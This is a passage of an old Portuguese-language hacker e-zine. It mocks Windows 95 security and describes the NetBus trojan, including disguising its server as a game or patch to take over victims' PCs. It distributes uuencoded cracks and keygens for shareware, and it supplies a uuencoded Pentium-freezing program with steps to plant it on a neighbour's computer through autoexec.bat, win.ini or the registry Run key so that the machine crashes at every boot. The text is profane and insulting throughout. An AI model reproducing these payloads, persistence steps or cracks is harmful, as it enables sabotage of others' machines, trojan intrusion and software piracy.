Password: asdf

**********************
*5-SEGURANCA NO WIN95*
**********************

Vou falar algo sobre a seguranca do windows 95 (se eh que ele tem), que nem
pode ser considerada seguranca eu acho, jah que esse sistema operacional nao
foi desenvlovido pra ser um provedor internet nem nada parecido os carinhas
que fizeram ele nem fizeram questao de botar uma seguranca forte, qualquer
um que nunca mexeu num computador antes, pode estragar o sistema, apenas
deletando alguns arquivos necessarios para sua inicializacao, as senhas como
as da rede dial-up, que eh o programa usado pra se conectar a internet,ficam
em arquivos com a extensao .pwl, geralmente com o nome da pessoa, mais ou 
menos como juca.pwl, esses arquivos geralmente teem uma criptografia muito 
fraca que um programa em alguns segundos descriptografa-os, enquanto em 
arquivos de senha como por exemplo do unix ou compativeis demoram muito mais
alem de voce precisar de uma word list para esses arquivos e no windows nao
precisa de word list nenhuma. A invasao por IP eu creio que seja facil,
jah sei de carinhas que conseguiram, mas nunca tentei, quebrar senhas da 
protecao de tela tambem sao faceis de serem quebradas, quase todos virus 
existentes por aih soh funcionam no windows, computadores com windows 95 
tambem sao alvo facil de ataques de nukes, como o codigo fonte do sistema 
nao eh publico, todo dia eu acho, a micro$$oft lanca um patch (correcao de 
um bug) pra algum problema nele, enquanto sistemas como o linux, que teem o
seu codigo fonte livre, pra voce fazer o que bem entender com ele, assim 
os bugs sao bem mais faceis de ser corrigidos, voce mesmo pode fazer a 
correcao dele se souber, alem de poder deixa-lo do jeito que quiser, 
se quiser avacalhar com ele, voce pode, jah com o windows, a historia eh
diferente, voce tem que se acostumar com ele, e se nao gostar, se foda,
porque vai ter que usa-lo assim mesmo e calar a boca, apesar de isso nao ter 
nada a ver com seguranca, tambem eh uma desvantagem dele, os programas 
feitos pra windows, geralmente sao sharewares, coisa de capitalistas imbecis
que soh querem ganhar dinheiro vendendo seus programas estupidos, e que 
geralmente nao servem pra nada, mas mesmo assim, voce eh meio obrigado a ter
ele instalado no seu computador, porque outros sistemas operacionais, mesmo
voce querendo, sao dificeis de achar arquivos, alguns programas soh existem
pra windows, e nenhum outro sistema operacional, resumindo:
o windows eh um sistema operacioanal que nao foi feito pra trabalhar em rede
ele foi feito pra voce fazer aqueles trabalhinhos bonitinhos no WORDinario,
porque nenhum outro editor de texto tem aquelas merdas todas, e se voce for
entregar um trabalho todo fudido pra sua professora vadia, ela nao vai 
aceitar, ou vai lhe dar um zero, entao, eu soh tenho uma coisa a dizer, voce
pode ter o windows instalado no seu computador, porque eh praticamente 
impossivel viver sem ele, mas tenha outro sistema operacional mais potente, 
pra voce entrar na internet com seguranca como o linux, mas se voce soh usa
o seu computador pra ficar jogando aqueles joguinhos bonitinhos, fique com o 
seu windows e nao instale outro sistema operacional, porque nao ha 
necessidade disso.

**********
*6-NETBUS*
**********

Netbus eh um programa em que que voce pode invadir o computador de alguem,
basta esse alguem ter um programinha que voce vai passar pra ele, que voce
pode acessar o computador inteiro dele tendo o netbus instalado no seu, esse
programa eh bastante perigoso, porque a pessoa que tem o netbus, pode fazer
o que quiser com seus arquivos, inclusive deleta-los, o que causaria um dano
bastante significativo pro seu windows 95, voce pode mandar o programinha 
que vai facilitar a sua vida como sendo um joguinho de ursinhos, e cujo o
nome do arquivo eh "whackamole.exe" ou como um arquivo com o nome de 
"patch.exe", alem de funcionar em windows 95/98, o netbus tambem funciona em
windows NT, caso voce venha fazer a burrada de jogar o joguinho dos ursinhos
ou rodar o arquivo patch.exe, ha um jeito de recuperar-se a tempo, vou dizer
os passos que voce deve seguir em caso de ter feito essa cagada:

1-Delete o arquivo patch.exe que entrara no seu diretorio do windows, logo 
apos voce rodar o patch.exe original
2-Rode o editor de registro do windows (regedit), e localize a palavra 
"patch", delete essa chave:
\HKEY_CURRENT_USER\PATCH
e o valor PATCH que estah dentro da seguinte chave:
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN\

logo depois de fazer isso, reinicie o windows, porque enquanto voce nao 
reinicia-lo, o patch.exe vai ficar rodando, e depois de reinicia-lo,
delete o patch.exe original e pronto, voce esta livre de ataques do NETBUS, 
mas alem de se defender nesse programa, voce tambem pode atacar e dar uma
brincadinha com o outro computador, por exemplo, voce pode abrir e fechar a
gaveta do Cd-Rom, deletar, renomear, e mandar arquivos, mandar mensagens, 
fechar janelas que estao sendo executadas, e tudo isso sem ter nennhum 
conhecimento de invasao por ip nem nada disso, basta digitar o ip da pessoa,
e pronto, voce jah esta mexendo no computador dela. 

************
*7-UUEncode*
************
Quando estava escrevendo essa zine, estava de bom humor, entao resolvi 
presentear todos com alguns crackers e key generators de programas shareware
Facam a festa:


Encrypted Magic Folders: basta colocar o emf.sys no mesmo diretorio que
estah o programa

--------------------------------CORTE AQUI----------------------------------
_=_ 
_=_ Part 001 of 001 of file Emf.zip
_=_ 

begin 666 Emf.zip
M4$L#!!0````(`+R63R5=+1!V)````"4````'````14U&+E-94].4"/^7P>S%
M[`^$;LR!S!S,B4#:33E>0:V61UA45%18N6`;`%!+`0(4`!0````(`+R63R5=
M+1!V)````"4````'````````````(`"V@0````!%348N4UE34$L%!@`````!
-``$`-0```$D`````````
`
end
--------------------------------CORTE AQUI----------------------------------

Gif Construction SEt: digite seu nome, pegue o numero de registro, va no 
programa e registre-o

--------------------------------CORTE AQUI----------------------------------
_=_ 
_=_ Part 001 of 001 of file GCS.zip
_=_ 

begin 666 GCS.zip
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
A`````$=#4RYC;VU02P4&``````$``0`U````$!$`````
`
end
--------------------------------CORTE AQUI----------------------------------

Cute Ftp 2.0: Digite seu nome,o programa vai criar um arquivo chamado nao 
sei o que .key, basta voce colocar esse arquivo no mesmo diretorio do seu
cute ftp e pronto, seu programa estara registrado.

--------------------------------CORTE AQUI----------------------------------
_=_ 
_=_ Part 001 of 001 of file cuteftp.zip
_=_ 

begin 666 cuteftp.zip
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
3!@`````!``$`.0```*<-````````
`
end
--------------------------------CORTE AQUI----------------------------------
**********
*8-FRASES*
**********

"Tudo que eh obrigatorio eh chato."
(Joao Gordo, vocalista do Ratos de Porao)

*********
*9-BONUS*
*********

*-
Esse mes na sessao de bonus vamos por um exploit pra processadores pentium,
basta roda-lo, se seu computador travar ele eh um pentium original, se ele
continuar rodando, seu processador eh falsificado (pelo menos eh o q eu li).

-------------------------------CORTE AQUI-----------------------------------

_=_ 
_=_ Part 001 of 001 of file i586.zip
_=_ 

begin 666 i586.zip
M4$L#!`H``````'6/(R2-A7J]!`````0````(````:34X-BYC;VWP#\?(4$L!
M`C(+"@``````=8\C)(V%>KT$````!`````@````````````@`/^!`````&DU
<.#8N8V]M4$L%!@`````!``$`-@```"H`````````
`
end

--------------------------------CORTE AQUI----------------------------------
depois de desuuencodear o arquivo e bota-lo no pc de seu vizinho, faca o 
seguinte para o pc dele travar sempre que for iniciado, ou sempre que o 
windows for iniciado:

Se o seu vizinho nao sabe porra nenhuma de computador, apenas insira uma 
linha no autoexec.bat dizendo o local onde esta o arquivo:
ex:
c:\windows\i586.exe

Se o seu vizinho jah sabe mexer no autoexec e no config e se acha o foda no
pc faca o seguinte, insira como no exemplo acima o local onde estah o
arquivo na linha "run=" do arquivo win.ini, que fica no diretorio do windows

ou se o seu vizinho jah sabe mexer no windows e tal, faca o seguinte, 
execute o regedit, vah em:
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
clique no menu da direita e escolha novo valor da sequencia, escolha um nome
clique nesse valor que voce criou, com o botao direito do mouse e escolha
modificar, e diga o local onde estah o arquivo, assim, toda vez que o 
windows for iniciado, vai chamar o programa e consequentemente travar e pra
tirar essa linha do registro, ele vai ter que ter um backup do arquivo 
user.dat que se chama user.da0 e renomea-lo pra user.dat.  

**-
Tambem botamos na sessao bonus esse mes, um codigo HTML que ninguem que
usa o internet exploder entre na sua pagina.

-------------------------------CORTE AQUI-----------------------------------
<html>
<head>
<title>No Internet Explorer</title>
</head>
<body bgcolor=#ffffff>
<script language="JavaScript">
<!-- 
document.write(navigator.appName)
document.write(navigator.appVersion)
if (navigator.appName == "Microsoft Internet Explorer") 
{alert("Internet Explorer não é navegador, pegue um navegador de verdade!")
location = "http://home.netscape.com"}
// -->
</script>
</body>
</html>
-------------------------------CORTE AQUI-----------------------------------
 
 
************
*10-MEMBERS*
************

dexter07-dexter07@bigfoot.com
